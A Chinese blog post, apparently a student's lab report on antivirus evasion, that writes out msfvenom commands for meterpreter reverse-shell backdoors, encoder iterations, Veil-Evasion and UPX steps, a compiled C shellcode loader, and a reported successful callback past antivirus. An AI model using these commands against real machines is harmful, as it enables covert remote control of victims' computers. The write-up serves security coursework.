202112325_3

已于 2024-04-10 22:33:25 修改
阅读量337 收藏 8
点赞数 5
文章标签: macos
于 2024-04-10 22:32:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sainahes/article/details/137613944
版权



https://img2024.cnblogs.com/blog/2551150/202404/2551150-20240410194927935-1305012291.png

20212325 2023-2024-2 《网络与系统攻防技术》实验三实验报告

20212325 2023-2024-2 《网络与系统攻防技术》实验三实验报告1.实验内容2.实验过程2.1基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.2正确使用msf编码器、msfvenom生成如jar之类的其他文件免杀检测生成jar格式的后门文件生成php格式的后门文件生成py文件2.3使用veil,加壳工具veil的安装对后门进行加壳处理2.4使用C + shellcode编程2.5通过组合应用各种技术实现恶意代码免杀利用python+aes_encrypt2.6用另一台电脑实测,在杀软开启的情况下,可运行并回连成功生成raw格式shellcode文件安装shellcode_launcher后实现回连回连成功!3.问题及解决方案4.学习感悟和思考

1.实验内容

  1. 使用msf编码器和veil-evasion生成各种类型的文件进行免杀测试,理解免杀的含义和基本思想,进行各种免杀尝试;

  2. 通过组合应用各种技术实现恶意代码免杀,尝试用另一台电脑测试回连。

2.实验过程

2.1基础问题回答
(1)杀软是如何检测出恶意代码的?

目前杀毒软件的原理主要有3种:

  1. 引擎与病毒库的交互作用,通过特征码提取与病毒库中的特征码进行比对识别病毒。

  2. 启发式Heuristic,通过程序的一些行为和特征来判断

  3. 在虚拟机技术上的启发式,通过建立一个虚拟环境运行程序对其进行全方位的检测。

(2)免杀是做什么?

免杀就是躲开杀软的识别,免杀的基本思想就是破坏特征,这里的特征有可能是特征码,还有可能是行为特征,只要破环了病毒或木马的固有特征,并且保证原有的功能没有改变,那么免杀就算是完成了。

(3)免杀的基本方法有哪些?

1.改变特征码

  • exe文件可以通过加壳的方法。加壳又包括压缩壳加密壳

  • 如果有shellcode(像Meterpreter),可以用encode进行编码,基于payload重新编译生成可执行文件,反复编码降低被查杀的可能性。

  • 如果有源代码,用其他语言进行重写再编译(如本次实验使用到的veil-evasion) 2.改变行为

  • 通讯方式 使用反弹式连接,即服务端(被控制端)会主动连接客户端(控制端)。

  • 使用隧道技术 隧道协议将其它协议的数据帧或包重新封装然后通过隧道发送,把所有要传送的数据全部封装到合法的报文里进行传送以绕过防火墙。

  • 加密数据

2.2正确使用msf编码器、msfvenom生成如jar之类的其他文件
免杀检测

  1. 参考实验二,在Kali上用msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=2325 -f exe > 20191218_backdoor.exe生成针对Windows的毒化后门可执行程序

  • img

  1. 放入VirusTotal和360安全卫士中进行扫描

  • VirusTotal中的扫描结果

    img

    70款杀软中56款报出了病毒,不加处理的后门程序能被大部分的杀软检测到

  • 火绒杀毒检测结果

    img

  1. 使用msf编码器多次迭代,生成exe文件

  • 编码会降低检出率,理论上讲多编码几次,可降低被检测出的可能性

  • 一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符 在Kali中输入如下命令

msfvenom -p windows/meterpreter/reverse_top -e x86/shikata_ga_nai -b '\x00' LHOST=172.20.10.2 LPORT=2325 -f exe > 20212325_exp3. exe

img

用VirusTotal检测还是能检测出问题

img

加入多次编码参数-i,继续尝试

img

查杀还是会检测出病毒

img

以上步骤说明简单的多次编码无法实现免杀

生成jar格式的后门文件

img

病毒检测

img

有32个机构检测出病毒

生成php格式的后门文件

img

检测

img

火绒检测

img

生成py文件

img

病毒检测

img

发现检测出病毒的机构没了

火绒

img

下面尝试使用嵌入式shellcode,手动实现Shellcode的加载工作,只生成shellcode,而不是完整的可执行文件,这一个简单的步骤,就可以降低VirusTotal的命中率。

2.3使用veil,加壳工具
veil的安装

安装命令行

sudo apt-get install veil-evasion

下载成功后,修改setup.sh

cd /usr/share/veil/config
sudo vim setup.sh  #权限需要提升才能修改

img

进入vim命令模式输入:set number显示行号,找到260行,修改下载源

img

修改完成后继续安装veil,一路点击下一个(或者默认选项)即可使用veil-evasion生成后门程序及检测

use evasion命令进入Evil-Evasion

img

img

输入命令use c/meterpreter/rev_tcp.py进入配置界面

img

设置IP和端口set LHOST 172.20.10.2set LPORT 2325

img

输入generate生成文件,接着输入命名20212325_payload,如果不输入就是默认为payload

img

文件传到Win10主机上通过VirusTotal检测,仍能被46个机构检测出病毒

img

对后门进行加壳处理

使用命令upx /var/lib/veil/output/compiled/20212325_payload.exe -o 20212325_payload_upx. exe进行加壳

img

再次检测,发现基本没有太大变化

img

2.4使用C + shellcode编程

通过命令用msf生成一段shellcode

msfvenom -p windows/meterpreter/reverse_top thost=172.20.10.2 1port=2325 -f c>20212325_c.c

img

生成攻击代码如下

img

下面将攻击代码写进C语言,使用i686-w64-mingw32-g++ 20212325_c.c -o 20212325_c.exe编译成Win10下可执行文件

img

再次进行检测,检出率还是有所下降的

img

2.5通过组合应用各种技术实现恶意代码免杀
利用python+aes_encrypt

打开veil,进入配置文件

img

修改好ip和端口号之后生成文件

img

生成了三个文件20212325_evasion、setup、runme,依次进行检测,20212325_evasion仍然能检测出来

img

img

img

利用python+aes_encrypt组合攻击的原理是使用了数据加密的方式进行多次编译后门软件

2.6用另一台电脑实测,在杀软开启的情况下,可运行并回连成功
生成raw格式shellcode文件

img

将其传到主机进行杀软扫描

kali:

img

Win7:

img

用杀软进行扫描,未发现病毒

img

安装shellcode_launcher后实现回连

img

img

回连成功!

img

3.问题及解决方案

4.学习感悟和思考

20212325刘方同
关注
20212313 2023-2024-2 《网络与系统攻防技术》实验三实验报告
m0_62278802的博客
04-09 1244
Veil-Evasion是Veil框架中的一个重要组件,主要用于生成绕过防病毒软件的恶意代码。它的设计目的是帮助渗透测试人员和安全研究人员评估其网络安全防御的效果,通过生成能够绕过常见防病毒软件和入侵检测系统的恶意软件样本,来模拟真实世界的攻击。list:列出可用的Payloads和Listeners。use:选择要使用的Payload或Listener。options:显示当前Payload或Listener的配置选项。set:设置Payload或Listener的选项值。
免杀技术
weixin_30823227的博客
05-27 322
一、基础知识 1.杀软是如何检测恶意代码的? (1)检测特征码 人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。 (2)启发式恶意软件检测 如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。 (3)基于行为检测 与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代...
恶意代码--杀毒软件查杀的对抗技巧分享
关注互联网安全的小虾米一枚
03-16 6816
0x01 静态查杀 静态特征码查杀概念 恶意代码--杀毒软件查杀的对抗技巧分享
拆解测试显示Mac Mini (2024)固态硬盘并未锁定 互换硬盘后仍可使用
weixin_41446370的博客
11-14 137
当然那这里又会存在一个新坑:某些二手交易平台上价格相对较低的 Mac Mini (2024) 16GB+2TB 版有可能就是替换的硬盘,如果用户不了解这种情况的话可能就会被割韭菜。不过知名拆解网站 iFixit 的测试显示,同型号的 Mac Mini 互换硬盘是可以继续使用的,这意味着苹果应该没有对硬盘小板进行锁定,所以在互换硬盘后重装系统仍然可以使用。但这仅限于同型号的,例如搭载 M4 芯片的和搭载 M4 Pro 芯片的固态硬盘是不能互换的,互换后将触发某种验证导致无法安装系统。
MacOS开发环境配置与应用开发--详细教程】
Dreams°的博客
11-10 829
macOS上进行应用开发,通常使用Xcode作为主要开发环境,Xcode集成了所有必需的工具和资源,支持多种编程语言,如Swift、Objective-C、C++等。
Mac 使用mac 原生工具将mp4视频文件提取其中的 mp3 音频文件
海到无边天作岸 山登绝顶我为峰
11-14 90
文章仅作为个人学习笔记记录,记录从0到1的一个过程希望对您有一点点帮助,如有错误欢迎小伙伴指正。
Mac解压包安装MongoDB8并设置launchd自启动
11-14 194
mac系统上安装Mongodb8,并launchd设置开启启动,配置mongodb环境变量,配置mongosh和mongod compass
超好用shell脚本NuShell mac安装
༺墨༒眉༻
11-11 366
Nu 管道使用结构化数据,你可以用同样的方式安全地选择,过滤和排序。一次学习,处处可用。网上说brew可能需要更新来解决错误,于是我使用brew update。大佬回复他们控制不了brew,并且我安装的是0.84版本是比较老的了。到这里nushell安装就完成了,强大之处慢慢挖掘吧。然后我猜可能是我的brew太久没更新了,然后谢过大佬。看看文档,可以brew安装,巧了咱也有brew。安装完成,使用nu启动,看一下效果,不错吧。具备强大的插件系统,Nu 可以轻松扩展。社区里问了下大佬,大概的意思就是。
macos 搭建自己的git pages
2301_77549977的博客
11-14 135
我的方法是,用vscode写一个文件,然后把 text粘过去,不会用终端写就这么搞了,还挺坎坷了,学习了 删除git索引 checkout。import pbd,pbd.set_trace()设置断点。p var 打印出变量名。
tauri开发中,使用node将png图片转成苹果的icns图标格式,解决tauri icon生成的mac图标过大问题
11-12 489
另外一种方式就是写一个js脚本,让自动执行生成一个icon图标。1.在项目cli下创建一个creatIcon.cjs脚本文件。
Mac中安装OhMyZsh
山路曲折盘旋,但毕竟朝着顶峰延伸
11-11 855
安装OhMyZsh的前提是安装Homebrew,如果有科学intenet的方式,直接选择官网的方式进行安装;如果homebrew安装完毕,验证完毕;文件,所以按道理在配置其它软件的环境变量时应该在这个文件中声明。但是有一个问题是,如果我们以后卸载或重新安装时,就需要重新同步一下。在使用过程中曾经遇到过一个问题,由于我们使用Oh-My-Zsh时会读取家目录下的。中声明,则可能会读取不到,因为此时我们使用的已经不是bash。安装Oh-My-Zsh后,会在家目录下产生一个。
macOS 设置固定IP
小田的笔记簿
11-11 154
基于 macOS 15.1。
「Mac玩转仓颉内测版12」PTA刷题篇3 - L1-003 个位数统计
最新发布
weixin_44217688的博客
11-14 361
本篇将继续讲解PTA平台上的题目 L1-003 个位数统计,通过对数字的处理与统计,掌握基础的字符串操作与数组计数功能,进一步提升Cangjie编程语言的实际应用能力。
mac 安装指定的node和npm版本
weixin_43858851的博客
11-11 302
mac 安装指定的node和npm版本
macOS sw_vers 查看当前系统版本
mixboot
11-12 398
macOS 命令行 查看当前系统版本
LaTeX之四:如何兼容中文(上手中文简历和中文论文)、在win/mac上安装新字体。
shanshan的博客
11-10 1083
LaTeX 默认不支持 Unicode 字符,因此在你的文档中使用 Unicode 字符(例如 山)时会报错。要解决这个问题,你可以使用 xeCJK 包,它允许在 LaTeX 文档中使用 Unicode 字符。:确保你使用的是XeLaTeX或LuaLaTeX进行编译,因为它们对Unicode和中文支持更好。你可以在你的LaTeX编辑器中选择编译器。选择一个你系统中已有的字体,并在LaTeX文档中使用它。正确安装字体:你需要确保系统中安装了你指定的中文字体,例如SimSun(宋体)。确保你的编辑器设置正确。
一文详解MacOS使用VSCode搭建SpringBoot+Gradle开发环境
bjxiaxueliang的CODING茶馆
11-11 455
开发后端Java应用时,大多数开发者使用的是IntelliJ IDEA,但该软件是一个付费软件,所以希望可以使用开源且免费的VSCode来创建和开发后端项目。本文为本人在 Mac 上使用 Visual Studio Code(简称 VSCode)集成开发环境来搭建一个基于 Spring Boot 和 Gradle 的开发环境的记录笔记。无论你是刚刚接触 Spring Boot 的新手还是有经验的开发者,这篇教程都将帮助你顺利开始你的 Spring Boot 之旅。
在 Mac 上使用 Docker 安装宝塔并部署 LNMP 环境
路漫漫其修远兮 吾将上下而求索
11-10 942
本篇文章旨在指导您如何在 Mac 上使用 Docker 容器来安装并运行宝塔面板,以便高效管理 LNMP 开发环境。在本文的最终目标中,我们将实现:通过启动 Docker 容器自动加载 Ubuntu 系统,且容器中的宝塔面板、Nginx、MySQL、PHP、Redis 等关键服务也将自动启动。同时,配置在 supervisord 中的各项任务也能够在容器启动时自动运行,以保证整个开发环境高效、稳定地自启动。
MAC HOMEBREW 验证问题
sinat_17584329的博客
11-14 254
遇到验证问题:当你运行 brew upgrade 升级所有软件包时,Homebrew 在验证 ca-certificates 的认证时遇到了问题,并且一直重试,间隔逐渐增加。这个方法是一个临时解决方案,尤其是在遇到GitHub速率限制或网络问题时,能够有效绕过认证验证,让升级过程继续进行。这会跳过 attestation 验证,但请注意,这种做法会让你失去对软件包来源的验证,可能存在一定的安全风险。如果你有更多问题,或希望探讨其他类似问题的解决方案,随时告诉我!
MacOS 本地生成SSH key并关联Github
weixin_41716656的博客
11-14 168
登陆github,右上角头像,点击settings,在左侧选择SSH and GPG keys,右边 add new ssh keys,粘贴刚才复制的内容,save。这时候~/.ssh 目录下应该会有两个文件,key_github 和 key_github.pub,用textEditor打开pub文件,复制里面的内容,生成一个名字叫key_github的ssh key pair,目录在~/.ssh/,文件名可以按自己喜好修改,邮箱用自己的。打开terminal测试连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值